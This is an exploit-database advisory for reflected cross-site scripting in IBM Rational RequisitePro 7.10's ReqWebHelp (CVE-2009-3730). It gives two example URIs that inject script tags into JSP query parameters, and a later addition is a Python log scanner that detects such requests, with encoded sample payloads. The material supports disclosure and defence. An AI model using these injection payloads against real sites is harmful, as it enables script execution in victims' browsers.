IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross-Site Scripting

2009-10-15T00:00:00
ID EDB-ID:10094
Type exploitdb
Reporter IBM
Modified 2009-10-15T00:00:00

Description

IBM Rational RequisitePro 7.10 and ReqWebHelp multiple cross-site scripting issues (CVE-2009-3730). Webapps exploit for the JSP platform.

                                        
Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=

http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>
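
For reviewing web server logs for requests shaped like the URIs above, the following added example (not part of the original advisory) flags requests to the two JSP paths whose listed parameters still contain markup characters after repeated URL-decoding. The function names, the decode limit, the character set checked and the sample request targets are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote, unquote_plus

# Paths and parameter names taken from the advisory's example URIs.
# Assumption: the application is deployed under the /ReqWebHelp context root.
WATCHED = {
    "/ReqWebHelp/advanced/workingSet.jsp": {"operation"},
    "/ReqWebHelp/basic/searchView.jsp": {"searchWord", "maxHits", "scopedSearch", "scope"},
}
# Angle brackets and double quotes; apostrophes are left out because they are
# common in legitimate search terms (assumption, tune for your traffic).
MARKUP = re.compile(r'[<>"]')
MAX_DECODE_ROUNDS = 3  # assumption: catches double/triple percent-encoding

def fully_decode(value):
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_request(target):
    """Return the sorted watched parameters whose decoded value holds markup."""
    parts = urlsplit(target)
    # Drop a ";jsessionid=..." style path parameter before matching the path.
    path = unquote(parts.path).split(";", 1)[0]
    watched = WATCHED.get(path)
    if watched is None:
        return []
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in watched and MARKUP.search(fully_decode(value)):
            hits.add(name)
    return sorted(hits)

# Constructed request targets, as they might appear in an access log.
SAMPLES = [
    "/ReqWebHelp/basic/searchView.jsp?searchWord=login+requirements&maxHits=50",
    "/ReqWebHelp/basic/searchView.jsp?searchWord=%3E%3Cscript%3Ealert(1)%3C/script%3E&maxHits=50",
    "/ReqWebHelp/advanced/workingSet.jsp;jsessionid=ABC?operation=add%252A%252F--%253E%253Cb%253E&workingSet=",
    "/ReqWebHelp/index.jsp?q=%3Cb%3E",
]

def scan(targets):
    """Map each flagged request target to the parameters that triggered it."""
    return {t: hits for t in targets if (hits := flag_request(t))}

if __name__ == "__main__":
    for target, params in scan(SAMPLES).items():
        print(params, target)
```

A hit here only means the request carried markup in a watched parameter; whether the response reflected it unencoded depends on the installed version.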